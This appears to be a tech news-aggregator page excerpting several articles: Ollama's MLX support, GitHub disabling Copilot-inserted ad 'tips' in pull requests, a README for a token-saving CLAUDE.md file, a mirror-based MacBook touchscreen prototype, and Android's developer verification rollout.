We are actively working to support future models. For users with custom models fine-tuned on supported architectures, we will introduce an easier way to import models into Ollama. In the meantime, we will expand the list of supported architectures.
Thank you to:
* The MLX contributor team who built an incredible acceleration framework
* The GGML & llama.cpp team who built a thriving local framework and community
* The Alibaba Qwen team for open-sourcing excellent models and their collaboration
...
Read the original on ollama.com »
Updated Microsoft has done a 180. Following backlash from developers, GitHub has removed Copilot’s ability to stick ads - what it calls “tips” - into any pull request that invokes its name.
Australian developer Zach Manson noted on Monday that, after a coworker asked Copilot to correct a typo in one of his pull requests, he was surprised to find a message from Copilot in the PR pushing readers to adopt productivity app Raycast.
“Quickly spin up Copilot coding agents from anywhere on your macOS or Windows machine with Raycast,” the note read with a lightning bolt emoji and link to install Raycast.
“Initially I thought there was some kind of training data poisoning or novel prompt injection and the Raycast team was doing some elaborate proof of concept marketing,” Manson told The Register in an email.
But no: Take a look around GitHub and you’ll see more than 11,400 PRs with the same tip in them, all seemingly added by Copilot. Take a look at the PRs’ code itself and search for the block invoking Copilot to add a tip and you’ll find plenty more examples of different tips being inserted by Copilot.
Manson told us that he’s not surprised to see GitHub doing this with an AI model, but he said it’s pretty offensive to see the Raycast ad inserted by Copilot into his own PR like he wrote it.
“I wasn’t even aware that the GitHub Copilot Review integration had the ability to edit other users’ descriptions and comments,” Manson told us. “I can’t think of a valid use case for that ability.”
It was only Monday morning when Microsoft watchers at Neowin picked up Manson’s report that Copilot was injecting what developers saw as ads into PRs, and, by the afternoon, GitHub had decided a recent change to Copilot may have gone a bit too far.
GitHub VP of developer relations Martin Woodward explained in a post on X later in the day Monday that Copilot inserting ads into PRs isn’t actually new behavior - it’s been doing so in the ones it creates for a while. Letting Copilot touch PRs it didn’t create, but is mentioned in, on the other hand, is new behavior that hasn’t really worked out.
“[When] we added the ability to have Copilot work on any PR by mentioning it the behaviour became icky,” Woodward said.
Tim Rogers, principal product manager for Copilot at GitHub, took to Hacker News on Monday to say that giving Copilot the ability to add “tips” to PRs was intended “to help developers learn new ways to use the agent in their workflow.”
Hearing feedback from the community following Manson’s post and the kerfuffle it generated, Rogers said, has helped him realize that “on reflection,” letting Copilot make changes to PRs written by a human without their knowledge “was the wrong judgement call.”
“We’ve now disabled these tips in pull requests created by or touched by Copilot, so you won’t see this happen again,” Rogers added. ®
Martin Woodward, VP of Developer Relations, GitHub, said in a statement: “GitHub does not and does not plan to include advertisements in GitHub. We identified a programming logic issue with a GitHub Copilot coding agent tip that surfaced in the wrong context within a pull request comment. We have removed agent tips from pull request comments moving forward.”
...
Read the original on www.theregister.com »
One file. Drop it in your project. Cuts Claude output verbosity by ~63%. No code changes required. Note: most Claude costs come from input tokens, not output. This file targets output behavior - sycophancy, verbosity, formatting noise. It won’t fix your biggest bill but it will fix your most annoying responses. Model support: benchmarks were run on Claude only. The rules are model-agnostic and should work on any model that reads context - but results on local models like llama.cpp, Mistral, or others are untested. Community results welcome.
When you use Claude Code, every word Claude generates costs tokens. Most people never control how Claude responds - they just get whatever the model decides to output.
* Opens every response with “Sure!”, “Great question!”, “Absolutely!”
* Ends with “I hope this helps! Let me know if you need anything!”
* Restates your question before answering it
* Adds unsolicited suggestions beyond what you asked
* Over-engineers code with abstractions you never requested
All of this wastes tokens. None of it adds value.
Drop CLAUDE.md into your project root. Claude Code reads it automatically. Behavior changes immediately.
This file works best for:
* Repeated structured tasks where Claude’s default verbosity compounds across hundreds of calls
* Teams who need consistent, parseable output format across sessions
This file is not worth it for:
* Single short queries - the file loads into context on every message, so on low-output exchanges it is a net token increase
* Casual one-off use - the overhead doesn’t pay off at low volume
* Fixing deep failure modes like hallucinated implementations or architectural drift - those require hooks, gates, and mechanical enforcement
* Pipelines using multiple fresh sessions per task - fresh sessions don’t carry the CLAUDE.md overhead benefit the same way persistent sessions do
* Parser reliability at scale - if you need guaranteed parseable output, use structured outputs (JSON mode, tool use with schemas) built into the API - that is a more robust solution than prompt-based formatting rules
* Exploratory or architectural work where debate, pushback, and alternatives are the point - the override rule lets you ask for that any time, but if that’s your primary workflow this file will feel restrictive
The honest trade-off:
The CLAUDE.md file itself consumes input tokens on every message. The savings come from reduced output tokens. The net is only positive when output volume is high enough to offset the persistent input cost. At low usage it costs more than it saves.
Same 5 prompts. Run without CLAUDE.md (baseline) then with CLAUDE.md (optimized).
~295 words saved per 4 prompts. Same information. Zero signal loss.
Methodology note: This is a 5-prompt directional indicator (T1-T3, T5 for word reduction; T4 is a format test), not a statistically controlled study. Claude’s output length varies naturally between identical prompts. No variance controls or repeated runs were applied. Treat the 63% as a directional signal for output-heavy use cases, not a precise universal measurement. The CLAUDE.md file itself adds input tokens on every message - net savings only apply when output volume is high enough to offset that persistent cost.
Scope rules to your actual failure modes, not generic ones.
Generic rules like “be concise” help but the real wins come from targeting specific failures you’ve actually hit. For example if Claude silently swallows errors in your pipeline, add a rule like: “when a step fails, stop immediately and report the full error with traceback before attempting any fix.” Specific beats generic every time.
CLAUDE.md files compose - use that.
Claude reads multiple CLAUDE.md files at once - global (~/.claude/CLAUDE.md), project-level, and subdirectory-level. This means:
* Keep general preferences (tone, format, ASCII rules) in your global file
* Keep project-specific constraints (“never modify /config without confirmation”) at the project level
This avoids bloating any single file and keeps rules close to where they apply.
Different project types need different levels of compression. Pick the base file + a profile, or use the base alone.
curl -o CLAUDE.md https://raw.githubusercontent.com/drona23/claude-token-efficient/main/CLAUDE.md
git clone https://github.com/drona23/claude-token-efficient
cp claude-token-efficient/profiles/CLAUDE.coding.md your-project/CLAUDE.md
Option 3 - Manual:
Copy the contents of CLAUDE.md from this repo into your project root.
User instructions always win. If you explicitly ask for a detailed explanation or verbose output, Claude will follow your instruction - the file never fights you.
Found a behavior that CLAUDE.md can fix? Open an issue with:
The annoying behavior (what Claude does by default)
The prompt that triggers it
Community submissions become part of the next version with full credit.
This project was built on real complaints from the Claude community. Full credit to every source that contributed a fix:
MIT - free to use, modify, and distribute.
Built by Drona Gangarapu - open to PRs, issues, and profile contributions.
...
Read the original on github.com »
We turned a MacBook into a touchscreen using only $1 of hardware and a little bit of computer vision. The proof-of-concept, dubbed “Project Sistine” after our recreation of the famous painting in the Sistine Chapel, was prototyped by me, Kevin, Guillermo, and Logan in about 16 hours.
The basic principle behind Sistine is simple. Surfaces viewed from an angle tend to look shiny, and you can tell if a finger is touching the surface by checking if it’s touching its own reflection.
Kevin, back in middle school, noticed this phenomenon and built ShinyTouch, utilizing an external webcam to build a touch input system requiring virtually no setup. We wanted to see if we could miniaturize the idea and make it work without an external webcam. Our idea was to retrofit a small mirror in front of a MacBook’s built-in webcam, so that the webcam would be looking down at the computer screen at a sharp angle. The camera would be able to see fingers hovering over or touching the screen, and we’d be able to translate the video feed into touch events using computer vision.
Our hardware setup was simple. All we needed was to position a mirror at the appropriate angle in front of the webcam. Here is our bill of materials:
After some iteration, we settled on a design that could be assembled in minutes using a knife and a hot glue gun.
The first step in processing video frames is detecting the finger. Here’s a typical example of what the webcam sees:
The finger detection algorithm needs to find the touch/hover point for further processing. Our current approach uses classical computer vision techniques. The processing pipeline consists of the following steps:
Find the two largest contours and ensure that the contours overlap in the
horizontal direction and the smaller one is above the larger one
Identify the touch/hover point as the midpoint of the line connecting the
top of the bottom contour and the bottom of the top contour
Distinguish between touch and hover based on the vertical distance between
the two contours
Shown above is the result of applying this process to a frame from the webcam. The finger and reflection (contours) are outlined in green, the bounding box is shown in red, and the touch point is shown in magenta.
The final step in processing the input is mapping the touch/hover point from webcam coordinates to on-screen coordinates. The two are related by a
homography. We compute the homography matrix through a calibration process where the user is prompted to touch specific points on the screen. After we collect data matching webcam coordinates with on-screen coordinates, we can estimate the homography robustly using RANSAC. This gives us a projection matrix that maps webcam coordinates to on-screen coordinates.
The video above demonstrates the calibration process, where the user has to follow a green dot around the screen. The video includes some debug information, overlaid on live video from the webcam. The touch point in webcam coordinates is shown in magenta. After the calibration process is complete, the projection matrix is visualized with red lines, and the software switches to a mode where the estimated touch point is shown as a blue dot.
In the current prototype, we translate hover and touch into mouse events, making existing applications instantly touch-enabled.
If we were writing our own touch-enabled apps, we could directly make use of touch data, including information such as hover height.
Project Sistine is a proof-of-concept that turns a laptop into a touchscreen using only $1 of hardware, and for a prototype, it works pretty well! With some simple modifications such as a higher resolution webcam (ours was 480p) and a curved mirror that allows the webcam to capture the entire screen, Sistine could become a practical low-cost touchscreen system.
Our Sistine prototype is open source, released under the MIT License.
...
Read the original on anishathalye.com »
The latest Android and Google Play news for app and game
developers.
Android developer verification: Rolling out to all developers on Play Console and Android Developer Console
Android is for everyone. It’s built on a commitment to an open and safe platform. Users should feel confident installing apps, no matter where they get them from. However, our recent analysis found over 90 times more malware from sideloaded sources than on Google Play. So as an extra layer of security, we are rolling out Android developer verification to help prevent malicious actors from hiding behind anonymity to repeatedly spread harm. Over the past several months, we’ve worked closely with the community to improve the design so we account for the many ways people use Android to balance openness with safety.
Today, we’re starting to roll out Android developer verification to all developers in both the new Android Developer Console and Play Console. This allows you to complete your verification and register your apps before user-facing changes begin later this year.
If you only distribute apps outside of Google Play, you can create an account in Android Developer Console today.
If you’re on Google Play, check your Play Console account for updates over the next few weeks. If you’ve already verified your identity here, then you’re likely already set.
Most of your users’ download experience will not change at all
While verification tools are rolling out now, the experience for users downloading your apps will not change until later this year. The user side protections will first go live in Brazil, Indonesia, Singapore, and Thailand this September, before expanding globally in 2027. We’ve shared this timeline early to ensure you have ample time to complete your verification.
Following this deadline, for the vast majority of users, the experience of installing apps will stay exactly the same. It’s only when a user tries to install an unregistered app that they’ll require ADB or advanced flow, helping us keep the broader community safe while preserving the flexibility for our power users.
Developers can still choose where to distribute their apps. Most users’ download experience will not change
Tailoring the verification experience to your feedback
To balance the need for safety with our commitment to openness, we’ve improved the verification experience based on your feedback. We’ve streamlined the developer experience to be more integrated with existing workflows and maintained choice for power users.
For Android Studio developers: In the next two months, you’ll see your app’s registration status right in Android Studio when you generate a signed App Bundle or APK.
You’ll see your app’s registration status in Android Studio when you generate a signed App Bundle or APK.
For Play developers: If you’ve completed Play Console’s developer verification requirements, your identity is already verified and we’ll automatically register eligible Play apps for you. In the rare case that we are unable to register your apps for you, you will need to follow the manual app claim process. Over the next couple of weeks, more details will be provided in the Play Console and through email. Also, you’ll be able to register apps you distribute outside of Play in the Play Console too.
The Android developer verification page in your Play Console will show the registration status for each of your apps.
For students and hobbyists: To keep Android accessible to everyone, we’re building a free, no government ID required, limited distribution account so you can share your work with up to 20 devices. You only need an email account to get started. Sign up for early access. We’ll send invites in June.
For power users: We are maintaining the choice to install apps from any source. You can use the new advanced flow for sideloading unregistered apps or continue using ADB. This maintains choice while protecting vulnerable users.
We’re rolling this out carefully and working closely with developers, users, and our partners. In April, we’ll introduce Android Developer Verifier, a new Google system service that will be used to check if an app is registered to a verified developer.
April 2026: Users will start to see Android Developer Verifier in their Google Systems services settings.
September 30, 2026: Apps must be registered by verified developers in order to be installed and updated on certified Android devices in Brazil, Indonesia, Singapore, and Thailand. Unregistered apps can be sideloaded with ADB or advanced flow.
2027 and beyond: We will roll out this requirement globally.
We’re committed to an Android that is both open and safe. Check out our developer guides to get started today.
...
Read the original on android-developers.googleblog.com »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.